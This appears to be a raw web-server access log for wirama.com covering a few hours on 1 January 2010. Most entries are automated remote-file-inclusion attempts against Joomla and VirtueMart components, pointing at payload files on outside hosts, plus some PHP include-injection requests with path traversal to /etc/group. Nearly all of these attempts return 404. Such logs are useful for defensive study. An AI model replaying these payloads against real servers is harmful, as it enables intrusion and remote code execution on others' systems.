66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /logs/access_090801.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:03:03:11 -0800] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
65.55.106.110 - - [01/Jan/2010:03:03:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.131.106.24 - - [01/Jan/2010:03:03:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
88.131.106.24 - - [01/Jan/2010:03:03:51 -0800] "GET /inquiries.htm HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.wirama.com"
65.55.106.110 - - [01/Jan/2010:03:04:13 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.98.216.61 - - [01/Jan/2010:03:04:24 -0800] "GET /logs/access_090801.log%20//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.wirama.com"
66.98.216.61 - - [01/Jan/2010:03:04:24 -0800] "GET /logs/access_090801.log%20//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.wirama.com"
207.46.199.195 - - [01/Jan/2010:03:04:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.46.199.195 - - [01/Jan/2010:03:06:50 -0800] "GET /_private/form_results.csv HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.227.82.174 - - [01/Jan/2010:03:06:50 -0800] "GET /logs/access_091101.log//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:03:06:50 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:03:06:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.250.255.243 - - [01/Jan/2010:03:17:05 -0800] "GET /logs/ HTTP/1.1" 200 3798 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
213.198.4.237 - - [01/Jan/2010:03:33:11 -0800] "GET /logs///administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.198.4.237 - - [01/Jan/2010:03:33:11 -0800] "GET /logs/access_090731.log///administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.198.4.237 - - [01/Jan/2010:03:33:11 -0800] "GET //administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
196.40.83.71 - - [01/Jan/2010:03:33:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "wirama.com"
196.40.83.71 - - [01/Jan/2010:03:33:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "wirama.com"
213.198.4.237 - - [01/Jan/2010:03:34:00 -0800] "GET /logs/access_090731.log///administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.198.4.237 - - [01/Jan/2010:03:34:01 -0800] "GET //administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.198.4.237 - - [01/Jan/2010:03:34:02 -0800] "GET /logs///administrator/components/com_virtuemart/header.php?mosConfig.absolute.path=http://www.barcamenando.it/open.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:03:34:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:34:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:34:39 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:35:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:35:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [01/Jan/2010:03:35:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [01/Jan/2010:03:35:04 -0800] "GET /logs/access_090501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.90.50.4 - - [01/Jan/2010:03:35:04 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:35:18 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:36:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:36:02 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:36:09 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:39:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:39:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:03:39:18 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:08 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:31 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
204.174.223.203 - - [01/Jan/2010:03:51:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:03:54:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:03:54:31 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:03:54:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.30.48.8 - - [01/Jan/2010:03:59:56 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:04:00:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.30.48.8 - - [01/Jan/2010:04:00:18 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
62.149.240.214 - - [01/Jan/2010:04:13:53 -0800] "GET /logs/access_090330.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
62.149.240.214 - - [01/Jan/2010:04:13:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
62.149.240.214 - - [01/Jan/2010:04:13:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
62.149.240.214 - - [01/Jan/2010:04:14:49 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
209.216.213.119 - - [01/Jan/2010:04:15:52 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.216.213.119 - - [01/Jan/2010:04:15:52 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.216.213.119 - - [01/Jan/2010:04:15:52 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
74.208.122.67 - - [01/Jan/2010:04:17:12 -0800] "GET /logs//setup.php?dir=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//espon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
74.208.122.67 - - [01/Jan/2010:04:17:12 -0800] "GET /setup.php?dir=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//espon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
62.149.240.214 - - [01/Jan/2010:04:17:50 -0800] "GET /logs/access_090330.log%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
62.149.240.214 - - [01/Jan/2010:04:18:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "wirama.com"
62.149.240.214 - - [01/Jan/2010:04:18:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lifeuniv.com/bbs/images/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "wirama.com"
91.121.11.58 - - [01/Jan/2010:04:22:00 -0800] "GET /logs///components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://id.indonesia.co.cc/adu/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
91.121.11.58 - - [01/Jan/2010:04:22:00 -0800] "GET //components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://id.indonesia.co.cc/adu/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "wirama.com"
188.93.208.12 - - [01/Jan/2010:04:22:32 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:04:22:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
188.93.208.12 - - [01/Jan/2010:04:22:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:03 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:03 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:03 -0800] "GET /logs/access_090501.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:09 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:37 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:37 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:43 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:49 -0800] "GET /logs/access_090330.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:49 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:27:49 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:28:06 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:28:06 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:28:06 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:31 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:31 -0800] "GET /logs/access_090501.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:31 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:37 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:29:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.116.32.13 - - [01/Jan/2010:04:29:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.116.32.13 - - [01/Jan/2010:04:29:43 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:52 -0800] "GET /logs/access_090329.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:57 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:29:57 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:14 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:14 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:14 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:15 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:15 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:15 -0800] "GET /logs/access_090330.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:30:16 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.104.154 - - [01/Jan/2010:04:31:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.104.154 - - [01/Jan/2010:04:31:00 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:31:33 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.195.112.187 - - [01/Jan/2010:04:31:36 -0800] "GET /logs/?D=D HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:31:49 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:31:49 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:31:49 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:04:32:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:04:32:08 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:04:32:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
